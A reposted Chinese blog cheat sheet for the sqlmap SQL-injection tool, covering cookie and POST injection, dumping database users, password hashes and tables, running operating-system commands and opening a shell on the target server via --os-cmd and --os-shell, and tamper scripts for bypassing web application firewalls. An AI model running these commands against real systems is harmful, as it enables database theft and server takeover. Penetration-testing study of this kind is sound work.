博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
sqlmap详解
阅读量:5025 次
发布时间:2019-06-12

本文共 1103 字,大约阅读时间需要 3 分钟。

-hh 获得详细帮助

-v  详细级别 0-6 默认为1

1.显示基本信息和警告信息

2.显示debug信息

3.显示注入的payload   建议使用

4.显示http请求

5.显示http响应

6.显示http响应页面

-d 直接连接数据库

-u 目标url

-r 从文件载入http请求 需要带绝对路径

Cookie 注入 sqlmap.py  -u "www.xxxxxx.com"  --cookie  "id=1"   -level 2 要将等级调为2才进行cookie 的测试

post 注入  sqlmap.py  -u "www.xxxx.com"  --data  "id=1"

               sqlmap.py  -u "www.xxxx.com"  --data  "username=&passwd=" (像一些表单提交型的,直接抓包,查看提交参数,写给data)

               sqlmap.py  -r  "请求数据包的文件 "  -p "id 可测试的参数"

--users 枚举数据库管理系统用户

--password  枚举数据库管理密码

access数据库的注入(--tables 列表名  --columns 列字段  --dunmp 下载数据)

除access数据库的其他数据库( --is-dba  查看当前数据库的权限、 --dbs  查看所有数据库名、--users 所有数据库用户 、 --current-db  当前数据库名、current-user 当前数据库用户)

--os-cmd cmd执行操作系统命令 ( 列: sqlmap.py -u "wwww.xxxxxxx.com" --os-cmd="net user" 相当于执行net user 命令 )

--os-shell  相当于给服务器写交互式shell  退出时一定要quit() 要不退出时,会把shell留在服务器上

--random-agent  随机选定Http的user-Agernt

--proxy  使用代理连接到目标url

绕过WAF的tamper插件的使用:

sqlmap.py  -u "www.xxxx.com"  -tamper  "脚本.py"

宽字节绕过 unmagicquotes.py 

用 /**/分割sql关键字  randomcomments.py

注释绕过  versionedkeywords.py

将注入语句插入带指定位置  (针对静态注入

sqlmap.py -u "www.xxxxxx.com/id/1*.html"  *代表注入的位置

 

转载于:https://www.cnblogs.com/pojun/p/6845169.html

你可能感兴趣的文章
归并排序求逆序对
查看>>
SQL2008用sql语句给字段添加说明
查看>>
JavaScript的对象创建
查看>>
树形DP(统计直径的条数 HDU3534)
查看>>
java-jdbc循环设置sql参数
查看>>
Vue 创建组件的方式
查看>>
java文件上传下载
查看>>
高并发下,log4j日志打印行数导致的内存溢出问题
查看>>
1.ArrayList和linkedList区别
查看>>
python swap
查看>>
楞次定理
查看>>
make: Warning: File `Makefile' has modification time 17 s in the future
查看>>
Delphi结构体的定义和使用
查看>>
二维条码识别系统设计原理
查看>>
周六周日为休息日的工厂日历修改变成工作日
查看>>
名侦探柯南人名
查看>>
restful
查看>>
转义字符串
查看>>
vue生命周期钩子函数
查看>>
Coding 第一次体验
查看>>